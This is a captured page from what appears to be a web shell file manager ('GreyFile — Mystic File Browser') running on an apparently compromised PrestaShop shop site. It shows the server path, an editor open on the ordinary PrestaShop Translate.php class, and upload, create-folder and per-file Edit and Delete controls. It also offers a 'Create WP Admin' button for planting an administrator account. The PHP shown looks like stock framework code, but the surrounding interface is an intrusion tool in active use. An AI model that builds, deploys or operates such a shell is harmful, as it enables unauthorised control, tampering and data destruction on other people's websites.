?? GreyFile — Mystic File Browser
Current path:
home
/
webdevt
/
www
/
schtroumpf.fr
/
classes
/
?? Create WP Admin
??
Go up: /home/webdevt/www/schtroumpf.fr
?? Editing: Translate.php
<?php /** * Copyright since 2007 PrestaShop SA and Contributors * PrestaShop is an International Registered Trademark & Property of PrestaShop SA * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.md. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://devdocs.prestashop.com/ for more information. * * @author PrestaShop SA and Contributors <contact@prestashop.com> * @copyright Since 2007 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) */ /** * Class TranslateCore. * * @since 1.5.0 */ class TranslateCore { public static $regexSprintfParams = '#(?:%%|%(?:[0-9]+\$)?[+-]?(?:[ 0]|\'.)?-?[0-9]*(?:\.[0-9]+)?[bcdeufFosxX])#'; public static $regexClassicParams = '/%\w+%/'; /** * @param string $string * @param string $class * @param bool $addslashes * @param bool $htmlentities * @param array|null $sprintf * * @return string */ public static function getFrontTranslation($string, $class, $addslashes = false, $htmlentities = true, $sprintf = null) { global $_LANG; $string = preg_replace("/\\\*'/", "\'", $string); $key = $class . '_' . md5($string); if (isset($_LANG[$key])) { $str = $_LANG[$key]; } else { $str = $string; } if ($htmlentities) { $str = htmlspecialchars($str, ENT_QUOTES, 'utf-8'); } $str = str_replace('"', '"', $str); if ( $sprintf !== null && (!is_array($sprintf) || !empty($sprintf)) && !(count($sprintf) === 1 && isset($sprintf['legacy'])) ) { $str = Translate::checkAndReplaceArgs($str, $sprintf); } return $addslashes ? addslashes($str) : stripslashes($str); } /** * Get a translation for an admin controller. * * @deprecated Use Context::getContext()->getTranslator()->trans() * * @param string $string * @param string $class * @param bool $addslashes * @param bool $htmlentities * @param array|null $sprintf * * @return string */ public static function getAdminTranslation($string, $class = 'AdminTab', $addslashes = false, $htmlentities = true, $sprintf = null) { @trigger_error(__FUNCTION__ . 'is deprecated. Use Context::getContext()->getTranslator()->trans() instead.', E_USER_DEPRECATED); $str = Context::getContext()->getTranslator()->trans($string); if ($htmlentities) { $str = htmlspecialchars($str, ENT_QUOTES, 'utf-8'); } $str = str_replace('"', '"', $str); if ( $sprintf !== null && (!is_array($sprintf) || !empty($sprintf)) && !(count($sprintf) === 1 && isset($sprintf['legacy'])) ) { $str = Translate::checkAndReplaceArgs($str, $sprintf); } return $addslashes ? addslashes($str) : $str; } /** * Get a translation for a module. * * @param string|ModuleCore $module * @param string $originalString * @param string $source * @param string|array|null $sprintf * @param bool $js * @param string|null $locale * @param bool $fallback [default=true] If true, this method falls back to the new translation system if no translation is found * * @return mixed|string * * @throws Exception */ public static function getModuleTranslation( $module, $originalString, $source, $sprintf = null, $js = false, $locale = null, $fallback = true, $escape = true ) { global $_MODULES, $_MODULE; static $langCache = []; // $_MODULES is a cache of translations for all module. // $translations_merged is a cache of wether a specific module's translations have already been added to $_MODULES static $translationsMerged = []; $name = $module instanceof ModuleCore ? $module->name : $module; if (null !== $locale) { $iso = Language::getIsoByLocale($locale); } if (empty($iso)) { $iso = Context::getContext()->language->iso_code; } if (!isset($translationsMerged[$name][$iso])) { $filesByPriority = [ // PrestaShop 1.5 translations _PS_MODULE_DIR_ . $name . '/translations/' . $iso . '.php', // PrestaShop 1.4 translations _PS_MODULE_DIR_ . $name . '/' . $iso . '.php', // Translations in theme _PS_THEME_DIR_ . 'modules/' . $name . '/translations/' . $iso . '.php', _PS_THEME_DIR_ . 'modules/' . $name . '/' . $iso . '.php', ]; foreach ($filesByPriority as $file) { if (file_exists($file)) { include_once $file; $_MODULES = !empty($_MODULES) ? array_merge($_MODULES, $_MODULE) : $_MODULE; } } $translationsMerged[$name][$iso] = true; } $string = preg_replace("/\\\*'/", "\'", $originalString); $key = md5($string); $cacheKey = $name . '|' . $string . '|' . $source . '|' . (int) $js . '|' . $iso; if (isset($langCache[$cacheKey])) { $ret = $langCache[$cacheKey]; } else { $currentKey = strtolower('<{' . $name . '}' . _THEME_NAME_ . '>' . $source) . '_' . $key; $defaultKey = strtolower('<{' . $name . '}prestashop>' . $source) . '_' . $key; if ('controller' == substr($source, -10, 10)) { $file = substr($source, 0, -10); $currentKeyFile = strtolower('<{' . $name . '}' . _THEME_NAME_ . '>' . $file) . '_' . $key; $defaultKeyFile = strtolower('<{' . $name . '}prestashop>' . $file) . '_' . $key; } if (isset($currentKeyFile) && !empty($_MODULES[$currentKeyFile])) { $ret = stripslashes($_MODULES[$currentKeyFile]); } elseif (isset($defaultKeyFile) && !empty($_MODULES[$defaultKeyFile])) { $ret = stripslashes($_MODULES[$defaultKeyFile]); } elseif (!empty($_MODULES[$currentKey])) { $ret = stripslashes($_MODULES[$currentKey]); } elseif (!empty($_MODULES[$defaultKey])) { $ret = stripslashes($_MODULES[$defaultKey]); } else { $ret = stripslashes($string); } if ( $sprintf !== null && (!is_array($sprintf) || !empty($sprintf)) && !(count($sprintf) === 1 && isset($sprintf['legacy'])) ) { $ret = Translate::checkAndReplaceArgs($ret, $sprintf); } if ($js) { $ret = addslashes($ret); } elseif ($escape) { $ret = htmlspecialchars($ret, ENT_COMPAT, 'UTF-8'); } if ($sprintf === null) { $langCache[$cacheKey] = $ret; } } if (!is_array($sprintf) && null !== $sprintf) { $sprintf_for_trans = [$sprintf]; } elseif (null === $sprintf) { $sprintf_for_trans = []; } else { $sprintf_for_trans = $sprintf; } /* * Native modules working on both 1.6 & 1.7 are translated in messages.xlf * So we need to check in the Symfony catalog for translations */ if ($ret === $originalString && $fallback) { $ret = Context::getContext()->getTranslator()->trans($originalString, $sprintf_for_trans, null, $locale); } return $ret; } /** * Get a translation for a PDF. * * @param string $string * @param array|null $sprintf * * @return string */ public static function getPdfTranslation($string, $sprintf = null) { global $_LANGPDF; $iso = Context::getContext()->language->iso_code; if (!Validate::isLangIsoCode($iso)) { Context::getContext()->getTranslator()->trans( 'Invalid language ISO code (%s)', [Tools::safeOutput($iso)], 'Admin.International.Notification' ); } if (!isset($_LANGPDF) || !is_array($_LANGPDF)) { return str_replace('"', '"', $string); } $string = preg_replace("/\\\*'/", "\'", $string); $key = md5($string); $str = (array_key_exists('PDF' . $key, $_LANGPDF) ? $_LANGPDF['PDF' . $key] : $string); if ( $sprintf !== null && (!is_array($sprintf) || !empty($sprintf)) && !(count($sprintf) === 1 && isset($sprintf['legacy'])) ) { $str = Translate::checkAndReplaceArgs($str, $sprintf); } return $str; } /** * Check if string use a specif syntax for sprintf and replace arguments if use it. * * @param string $string * @param array $args * * @return string */ public static function checkAndReplaceArgs($string, $args) { if (!empty($args) && self::isSprintfString($string)) { return vsprintf($string, $args); } elseif (!empty($args)) { return strtr($string, $args); } return $string; } /** * Perform operations on translations after everything is escaped and before displaying it. */ public static function postProcessTranslation($string, $params) { // If tags were explicitely provided, we want to use them *after* the translation string is escaped. if (!empty($params['tags'])) { foreach ($params['tags'] as $index => $tag) { // Make positions start at 1 so that it behaves similar to the %1$d etc. sprintf positional params $position = $index + 1; // extract tag name $match = []; if (preg_match('/^\s*<\s*(\w+)/', $tag, $match)) { $opener = $tag; $closer = '</' . $match[1] . '>'; $string = str_replace('[' . $position . ']', $opener, $string); $string = str_replace('[/' . $position . ']', $closer, $string); $string = str_replace('[' . $position . '/]', $opener . $closer, $string); } } } return $string; } /** * Compatibility method that just calls postProcessTranslation. * * @deprecated renamed this to postProcessTranslation, since it is not only used in relation to smarty */ public static function smartyPostProcessTranslation($string, $params) { return Translate::postProcessTranslation($string, $params); } /** * Helper function to make calls to postProcessTranslation more readable. * * @deprecated 1.7.1.0 */ public static function ppTags($string, $tags) { Tools::displayAsDeprecated(); return Translate::postProcessTranslation($string, ['tags' => $tags]); } /** * @param string $string * * @return bool */ private static function isSprintfString($string) { return (bool) preg_match_all(static::$regexSprintfParams, $string) && !(bool) preg_match_all(static::$regexClassicParams, $string); } }
Save
Upload
??
Create Folder
??
Create File
??
assets
|
??? Delete
??
cache
|
??? Delete
??
checkout
|
??? Delete
??
container
|
??? Delete
??
controller
|
??? Delete
??
db
|
??? Delete
??
exception
|
??? Delete
??
form
|
??? Delete
??
helper
|
??? Delete
??
lang
|
??? Delete
??
log
|
??? Delete
??
module
|
??? Delete
??
order
|
??? Delete
??
pdf
|
??? Delete
??
product
|
??? Delete
??
proxy
|
??? Delete
??
range
|
??? Delete
??
shop
|
??? Delete
??
Smarty
|
??? Delete
??
stock
|
??? Delete
??
tax
|
??? Delete
??
tree
|
??? Delete
??
webservice
|
??? Delete
??
Access.php
|
?? Edit
|
??? Delete
??
Address.php
|
?? Edit
|
??? Delete
??
AddressChecksumCore.php
|
?? Edit
|
??? Delete
??
AddressFormat.php
|
?? Edit
|
??? Delete
??
Alias.php
|
?? Edit
|
??? Delete
??
Attachment.php
|
?? Edit
|
??? Delete
??
AttributeGroup.php
|
?? Edit
|
??? Delete
??
Carrier.php
|
?? Edit
|
??? Delete
??
Cart.php
|
?? Edit
|
??? Delete
??
CartRule.php
|
?? Edit
|
??? Delete
??
Category.php
|
?? Edit
|
??? Delete
??
Chart.php
|
?? Edit
|
??? Delete
??
ChecksumInterface.php
|
?? Edit
|
??? Delete
??
CMS.php
|
?? Edit
|
??? Delete
??
CMSCategory.php
|
?? Edit
|
??? Delete
??
CMSRole.php
|
?? Edit
|
??? Delete
??
Combination.php
|
?? Edit
|
??? Delete
??
Configuration.php
|
?? Edit
|
??? Delete
??
ConfigurationKPI.php
|
?? Edit
|
??? Delete
??
ConfigurationTest.php
|
?? Edit
|
??? Delete
??
Connection.php
|
?? Edit
|
??? Delete
??
ConnectionsSource.php
|
?? Edit
|
??? Delete
??
Contact.php
|
?? Edit
|
??? Delete
??
Context.php
|
?? Edit
|
??? Delete
??
Cookie.php
|
?? Edit
|
??? Delete
??
Country.php
|
?? Edit
|
??? Delete
??
CSV.php
|
?? Edit
|
??? Delete
??
Currency.php
|
?? Edit
|
??? Delete
??
Curve.php
|
?? Edit
|
??? Delete
??
Customer.php
|
?? Edit
|
??? Delete
??
CustomerAddress.php
|
?? Edit
|
??? Delete
??
CustomerMessage.php
|
?? Edit
|
??? Delete
??
CustomerSession.php
|
?? Edit
|
??? Delete
??
CustomerThread.php
|
?? Edit
|
??? Delete
??
Customization.php
|
?? Edit
|
??? Delete
??
CustomizationField.php
|
?? Edit
|
??? Delete
??
DateRange.php
|
?? Edit
|
??? Delete
??
Delivery.php
|
?? Edit
|
??? Delete
??
Dispatcher.php
|
?? Edit
|
??? Delete
??
Employee.php
|
?? Edit
|
??? Delete
??
EmployeeSession.php
|
?? Edit
|
??? Delete
??
Feature.php
|
?? Edit
|
??? Delete
??
FeatureFlag.php
|
?? Edit
|
??? Delete
??
FeatureValue.php
|
?? Edit
|
??? Delete
??
FileUploader.php
|
?? Edit
|
??? Delete
??
Gender.php
|
?? Edit
|
??? Delete
??
Group.php
|
?? Edit
|
??? Delete
??
GroupReduction.php
|
?? Edit
|
??? Delete
??
Guest.php
|
?? Edit
|
??? Delete
??
Hook.php
|
?? Edit
|
??? Delete
??
Image.php
|
?? Edit
|
??? Delete
??
ImageManager.php
|
?? Edit
|
??? Delete
??
ImageType.php
|
?? Edit
|
??? Delete
??
index.php
|
?? Edit
|
??? Delete
??
Language.php
|
?? Edit
|
??? Delete
??
Link.php
|
?? Edit
|
??? Delete
??
LocalizationPack.php
|
?? Edit
|
??? Delete
??
Mail.php
|
?? Edit
|
??? Delete
??
Manufacturer.php
|
?? Edit
|
??? Delete
??
ManufacturerAddress.php
|
?? Edit
|
??? Delete
??
Media.php
|
?? Edit
|
??? Delete
??
Message.php
|
?? Edit
|
??? Delete
??
Meta.php
|
?? Edit
|
??? Delete
??
Notification.php
|
?? Edit
|
??? Delete
??
ObjectModel.php
|
?? Edit
|
??? Delete
??
Pack.php
|
?? Edit
|
??? Delete
??
Page.php
|
?? Edit
|
??? Delete
??
PaymentFree.php
|
?? Edit
|
??? Delete
??
PaymentModule.php
|
?? Edit
|
??? Delete
??
PhpEncryption.php
|
?? Edit
|
??? Delete
??
PhpEncryptionEngine.php
|
?? Edit
|
??? Delete
??
PrestaShopAutoload.php
|
?? Edit
|
??? Delete
??
PrestaShopBackup.php
|
?? Edit
|
??? Delete
??
PrestaShopCollection.php
|
?? Edit
|
??? Delete
??
PrestaShopLogger.php
|
?? Edit
|
??? Delete
??
Product.php
|
?? Edit
|
??? Delete
??
ProductAssembler.php
|
?? Edit
|
??? Delete
??
ProductAttribute.php
|
?? Edit
|
??? Delete
??
ProductDownload.php
|
?? Edit
|
??? Delete
??
ProductPresenterFactory.php
|
?? Edit
|
??? Delete
??
ProductSale.php
|
?? Edit
|
??? Delete
??
ProductSupplier.php
|
?? Edit
|
??? Delete
??
Profile.php
|
?? Edit
|
??? Delete
??
QqUploadedFileForm.php
|
?? Edit
|
??? Delete
??
QqUploadedFileXhr.php
|
?? Edit
|
??? Delete
??
QuickAccess.php
|
?? Edit
|
??? Delete
??
RequestSql.php
|
?? Edit
|
??? Delete
??
Risk.php
|
?? Edit
|
??? Delete
??
Search.php
|
?? Edit
|
??? Delete
??
SearchEngine.php
|
?? Edit
|
??? Delete
??
SpecificPrice.php
|
?? Edit
|
??? Delete
??
SpecificPriceRule.php
|
?? Edit
|
??? Delete
??
State.php
|
?? Edit
|
??? Delete
??
Store.php
|
?? Edit
|
??? Delete
??
Supplier.php
|
?? Edit
|
??? Delete
??
SupplierAddress.php
|
?? Edit
|
??? Delete
??
Tab.php
|
?? Edit
|
??? Delete
??
Tag.php
|
?? Edit
|
??? Delete
??
Tools.php
|
?? Edit
|
??? Delete
??
Translate.php
|
?? Edit
|
??? Delete
??
TranslatedConfiguration.php
|
?? Edit
|
??? Delete
??
Upgrader.php
|
?? Edit
|
??? Delete
??
Uploader.php
|
?? Edit
|
??? Delete
??
Validate.php
|
?? Edit
|
??? Delete
??
ValidateConstraintTranslator.php
|
?? Edit
|
??? Delete
??
WarehouseAddress.php
|
?? Edit
|
??? Delete
??
Zone.php
|
?? Edit
|
??? Delete